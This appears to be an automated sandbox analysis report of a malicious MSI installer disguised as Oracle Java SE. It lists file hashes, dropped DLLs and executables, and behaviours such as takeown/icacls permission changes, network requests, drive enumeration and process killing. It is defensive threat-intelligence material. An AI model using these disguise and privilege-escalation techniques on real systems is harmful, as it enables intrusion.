SHA512 9bd164cc4b9ef07386762d3775c6d9528b82d4a9dc508c3040104b8d41cfec52eb0b7e6f8dc47c5021ce2fe3ca542c4ae2b54fd02d76b0eabd9724484621a105

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6525274CBC2077D43D7D17A33C868C4F

MD5 aecbc3ea574af22e388ebfb340db35e9
SHA1 3d00105e58eed12a2bf2340efe22e6a3a47d578a
SHA256 5866d50e054c8a7cfefa93ad2ddfc27a3684dd303726ac5e52ab3afb43360824
SHA512 45a72f343c06b93497b5f0648c1cd3767eef3488eef9d52522c3f9540f08de7779d2572ee8b5deb255ac1c6416c395fcd88d8b3edb7b18c015d52e89aad157d4

C:\Windows\Installer\MSICC51.tmp

MD5 a3ae5d86ecf38db9427359ea37a5f646
SHA1 eb4cb5ff520717038adadcc5e1ef8f7c24b27a90
SHA256 c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74
SHA512 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe

MD5 a27bdbc102aa90a99bc5538bb271b4d3
SHA1 eb18ea9eee793aa76eab49feea0e6490c4ded61e
SHA256 e85b4b2991b3772ab7bfaf0012fe5dfd754fd0c3661466e556b20f5ca8f2b4de
SHA512 cc0cbdc74b419a77f8250cd80f68af5b227383ee904707187b8971d3ed478cb80edcf7ab27390e34be65b599fb214925577afecc6e82d41db9000c50f71da421

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\MSVCP140.dll

MD5 9dda681b0406c3575e666f52cbde4f80
SHA1 1951c5b2c689534cdc2fbfbc14abbf9600a66086
SHA256 1ecd899f18b58a7915069e17582b8bf9f491a907c3fdf22b1ba1cbb2727b69b3
SHA512 753d0af201d5c91b50e7d1ed54f44ee3c336f8124ba7a5e86b53836df520eb2733b725b877f83fda6a9a7768379b5f6fafa0bd3890766b4188ebd337272e9512

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140.dll

MD5 e008fbfdea1bf873f3d94d74c1cf7935
SHA1 2a2af5e9084e7b55cdd5d01df342b02c1917573c
SHA256 678f9d715220512a823ca45d7e8545a1288728d8d47243e072e17049441cdd2b
SHA512 145acb67ab06dc90e5c7ed89623a339f595998af683bf47d665ffa23b05f9b87016b3ae5777c2c45f53b91a757e510b0f5aa5a9b908d79df3d566b2307d9d3d0

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll

MD5 fb0ca6cbfff46be87ad729a1c4fde138
SHA1 2c302d1c535d5c40f31c3a75393118b40e1b2af9
SHA256 1ee8e99190cc31b104fb75e66928b8c73138902fefedbcfb54c409df50a364df
SHA512 99144c67c33e89b8283c5b39b8bf68d55638daa6acc2715a2ac8c5dba4170dd12299d3a2dffb39ae38ef0872c2c68a64d7cdc6ceba5e660a53942761cb9eca83

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll

MD5 c9a55de62e53d747c5a7fddedef874f9
SHA1 c5c5a7a873a4d686bfe8e3da6dc70f724ce41bad
SHA256 b5c725bbb475b5c06cc6cb2a2c3c70008f229659f88fba25ccd5d5c698d06a4b
SHA512 adca0360a1297e80a8d3c2e07f5fbc06d2848f572f551342ad4c9884e4ab4bd1d3b3d9919b4f2b929e2848c1a88a4e844dd38c86067cace9685f9640db100efb

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll

MD5 3f224766fe9b090333fdb43d5a22f9ea
SHA1 548d1bb707ae7a3dfccc0c2d99908561a305f57b
SHA256 ae5e73416eb64bc18249ace99f6847024eceea7ce9c343696c84196460f3a357
SHA512 c12ea6758071b332368d7ef0857479d2b43a4b27ceeab86cbb542bd6f1515f605ea526dfa3480717f8f452989c25d0ee92bf3335550b15ecec79e9b25e66a2ca

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll

MD5 23bd405a6cfd1e38c74c5150eec28d0a
SHA1 1d3be98e7dfe565e297e837a7085731ecd368c7b
SHA256 a7fa48de6c06666b80184afee7e544c258e0fb11399ab3fe47d4e74667779f41
SHA512 c52d487727a34fbb601b01031300a80eca7c4a08af87567da32cb5b60f7a41eb2cae06697cd11095322f2fc8307219111ee02b60045904b5c9b1f37e48a06a21

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll

MD5 6e704280d632c2f8f2cadefcae25ad85
SHA1 699c5a1c553d64d7ff3cf4fe57da72bb151caede
SHA256 758a2f9ef6908b51745db50d89610fe1de921d93b2dbea919bfdba813d5d8893
SHA512 ade85a6cd05128536996705fd60c73f04bab808dafb5d8a93c45b2ee6237b6b4ddb087f1a009a9d289c868c98e61be49259157f5161feccf9f572fd306b460e6

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll

MD5 95c5b49af7f2c7d3cd0bc14b1e9efacb
SHA1 c400205c81140e60dffa8811c1906ce87c58971e
SHA256 ff9b51aff7fbec8d7fe5cc478b12492a59b38b068dc2b518324173bb3179a0e1
SHA512 f320937b90068877c46d30a15440dc9ace652c3319f5d75e0c8bb83f37e78be0efb7767b2bd713be6d38943c8db3d3d4c3da44849271605324e599e1242309c3

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll

MD5 79ee4a2fcbe24e9a65106de834ccda4a
SHA1 fd1ba674371af7116ea06ad42886185f98ba137b
SHA256 9f7bda59faafc8a455f98397a63a7f7d114efc4e8a41808c791256ebf33c7613
SHA512 6ef7857d856a1d23333669184a231ad402dc62c8f457a6305fe53ed5e792176ca6f9e561375a707da0d7dd27e6ea95f8c4355c5dc217e847e807000b310aa05c

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll

MD5 1776a2b85378b27825cf5e5a3a132d9a
SHA1 626f0e7f2f18f31ec304fe7a7af1a87cbbebb1df
SHA256 675b1b82dd485cc8c8a099272db9241d0d2a7f45424901f35231b79186ec47ee
SHA512 541a5dd997fc5fec31c17b4f95f03c3a52e106d6fb590cb46bdf5adad23ed4a895853768229f3fbb9049f614d9bae031e6c43cec43fb38c89f13163721bb8348

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll

MD5 ad99c2362f64cde7756b16f9a016a60f
SHA1 07c9a78ee658bfa81db61dab039cffc9145cc6cb
SHA256 73ab2161a7700835b2a15b7487045a695706cc18bcee283b114042570bb9c0aa
SHA512 9c72f239adda1de11b4ad7028f3c897c93859ef277658aeaa141f09b7ddfe788d657b9cb1e2648971ecd5d27b99166283110ccba437d461003dbb9f6885451f7

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll

MD5 d5166ab3034f0e1aa679bfa1907e5844
SHA1 851dd640cb34177c43b5f47b218a686c09fa6b4c
SHA256 7bcab4ca00fb1f85fea29dd3375f709317b984a6f3b9ba12b8cf1952f97beee5
SHA512 8f2d7442191de22457c1b8402faad594af2fe0c38280aaafc876c797ca79f7f4b6860e557e37c3dbe084fe7262a85c358e3eeaf91e16855a91b7535cb0ac832e

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll

MD5 9ddea3cc96e0fdd3443cc60d649931b3
SHA1 af3cb7036318a8427f20b8561079e279119dca0e
SHA256 b7c3ebc36c84630a52d23d1c0e79d61012dfa44cdebdf039af31ec9e322845a5
SHA512 1427193b31b64715f5712db9c431593bdc56ef512fe353147ddb7544c1c39ded4371cd72055d82818e965aff0441b7cbe0b811d828efb0ece28471716659e162

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140_1.dll

MD5 1e109b1d40efcfec81a5d43d318cbb26
SHA1 03aae193dc36d70fb34257d1276666e988b4a222
SHA256 0f04b4cb12543687d8416dfc307593a1dbc450939fd7980d124fed4144732d69
SHA512 762bb0fa8528936c8cfbd05e8beb557b9d751f3850124b3dcec102e3cd55550408666ffb27fea5472420ea40d95453279769765eee8f94ed2afa3d721018e1c4

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll

MD5 034379bcea45eb99db8cdfeacbc5e281
SHA1 bbf93d82e7e306e827efeb9612e8eab2b760e2b7
SHA256 8b543b1bb241f5b773eb76f652dad7b12e3e4a09230f2e804cd6b0622e8baf65
SHA512 7ea6efb75b0c59d3120d5b13da139042726a06d105c924095ed252f39ac19e11e8a5c6bb1c45fa7519c0163716745d03fb9daaaca50139a115235ab2815cc256

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 228c6bbe1bce84315e4927392a3baee5
SHA1 ba274aa567ad1ec663a2f9284af2e3cb232698fb
SHA256 ac0cec8644340125507dd0bc9a90b1853a2d194eb60a049237fb5e752d349065
SHA512 37a60cce69e81f68ef62c58bba8f2843e99e8ba1b87df9a5b561d358309e672ae5e3434a10a3dde01ae624d1638da226d42c64316f72f3d63b08015b43c56cab

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll

MD5 9b79fda359a269c63dcac69b2c81caa4
SHA1 a38c81b7a2ec158dfcfeb72cb7c04b3eb3ccc0fb
SHA256 4d0f0ea6e8478132892f9e674e27e2bc346622fc8989c704e5b2299a18c1d138
SHA512 e69d275c5ec5eae5c95b0596f0cc681b7d287b3e2f9c78a9b5e658949e6244f754f96ad7d40214d22ed28d64e4e8bd507363cdf99999fea93cfe319078c1f541

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll

MD5 39325e5f023eb564c87d30f7e06dff23
SHA1 03dd79a7fbe3de1a29359b94ba2d554776bdd3fe
SHA256 56d8b7ee7619579a3c648eb130c9354ba1ba5b33a07a4f350370ee7b3653749a
SHA512 087b9dcb744ad7d330bacb9bda9c1a1df28ebb9327de0c5dc618e79929fd33d1b1ff0e1ef4c08f8b3ea8118b968a89f44fe651c66cba4ecbb3216cd4bcce3085

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll

MD5 8da414c3524a869e5679c0678d1640c1
SHA1 60cf28792c68e9894878c31b323e68feb4676865
SHA256 39723e61c98703034b264b97ee0fe12e696c6560483d799020f9847d8a952672
SHA512 6ef3f81206e7d4dca5b3c1fafc9aa2328b717e61ee0acce30dfb15ad0fe3cb59b2bd61f92bf6046c0aae01445896dcb1485ad8be86629d22c3301a1b5f4f2cfa

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll

MD5 70e9104e743069b573ca12a3cd87ec33
SHA1 4290755b6a49212b2e969200e7a088d1713b84a2
SHA256 7e6b33a4c0c84f18f2be294ec63212245af4fd8354636804ffe5ee9a0d526d95
SHA512 e979f28451d271f405b780fc2025707c8a29dcb4c28980ca42e33d4033666de0e4a4644defec6c1d5d4bdd3c73d405fafcffe3320c60134681f62805c965bfd9

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll

MD5 b3c188281aa3998f49391da0c3b52b8e
SHA1 67e6f1eb07861dddde3df9d266f683cb0331d433
SHA256 59481427f4dad6460ac60c7619f628d6b7fad33562bbd8dc9145715ebb300e46
SHA512 42d7a71d4ce1e0c6ea50ddbf960b6f0d25b32526604295f50688bf4770db7338d4b32f0dda738ae147def66788497537f708becdeb720e299c614c28fe824665

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll

MD5 888aa12cc20f645dd2fc04f52e453bc6
SHA1 b19e790c9e6ceface9cdd41a24518d6e4a953b23
SHA256 93e2aa20251e1a0485828c3e29b60e17ff2f3ec1285455d059ffe1b1a24518eb
SHA512 f7d7a67244ff4f9a269461b49cdcd44d923840154447ca7ace61ef8167b79605c2f3c29a1d607b44831e68a696ef219710c4f1658a6fa73e564b7f252b031dc3

C:\Config.Msi\f77c94a.rbs

MD5 83368ac0b481e890e8d9fd0336d43875
SHA1 f48b75fec1ce419fa8ca15cb017ed4a7e7b1da74
SHA256 feb491b96103b94b4582987a7f9a978909a9bb4274edc8f133002e5a296b57f2
SHA512 27e7922c94e48d1cacd26cca7688b4b45246e22b7c3fb12c5231649459f9183fa0f02665fd736241397ada25d2929d15f5f0211d519534dbbfed0a009ae4b3d2

C:\Windows\Installer\f77c948.msi

MD5 4c11285fc4be4ffa97a866fbc13bbd83
SHA1 67230603c53081c6436658c3e7b90048a61cb5ed
SHA256 f8cf786235acc09140f9f2b21f61d2f2886f2592afb814b29bffd5550be849e9
SHA512 4f8654d49aa571890473ffb4743dbeee311efbbec09fec307fbcf4803041c976dde0711a72865820edbc5b94487609622adbd9d7694dc8394eee44a5821ef4e1

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe

MD5 96b62cfb83cf0e9790a3ef939173ee31
SHA1 23ecaefa21524e9446ea16e1f532f8bf9c5a56f1
SHA256 6fe23163ea43ab8d9e84fed45b8590fe643d599c7f218ea05d505e3aeea86f23
SHA512 d018997c50702fe035bd3974180f274ffa34605bd19a3ce8fbabf96633794afe8f1ee4a2ee731a9ff3c73163e45ad26f8d7bac30b9ae55d1d47c8a333b657b6b

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll

MD5 a3ba8128253c2f6bf043d636100d62de
SHA1 f47a211b1d09d75ff820d2c2e2fd9fa0338562a5
SHA256 599f9c72db7ba72b2d13c222f9121d7b564fbd0b401be44bd05a660e43d93bce
SHA512 89f2d39a507a40bbf096fd10816b901c472ce5b184b7de70d9d80c97f42db5029e877201df7abd828c4f475d279617d4e24b673608136659a9602cf14385f5ae

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll

MD5 e7fcab954f116c8bb4b006145c20dd23
SHA1 91ee70a33ab12618f0f0ec229de4583d9aa52a8a
SHA256 e52b21f458c61dab957fea7286544a0c6531a4caf5c97c323eea10a61a0b38b2
SHA512 d5cf56a35697b4afd88721f7c60156fd5b1ef7b659e8fe5e98db79f8fa41b394662bc4182b41af1a5a029ec3b04c909629db83d146683ca382958199f6ea73b9

memory/1168-220-0x000007FEF5960000-0x000007FEF5DE0000-memory.dmp

memory/1168-221-0x000007FEF5960000-0x000007FEF5DE0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-16 08:21

Reported

2024-10-16 08:24

Platform

win10v2004-20241007-en

Max time kernel

142s

Max time network

122s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-conio-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\msvcp140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-private-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-process-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140_1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-multibyte-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\e57762a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7772.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57762c.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\Logo.ico C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\Logo.ico C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7BDA.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57762a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI77C1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI79E5.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\takeown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
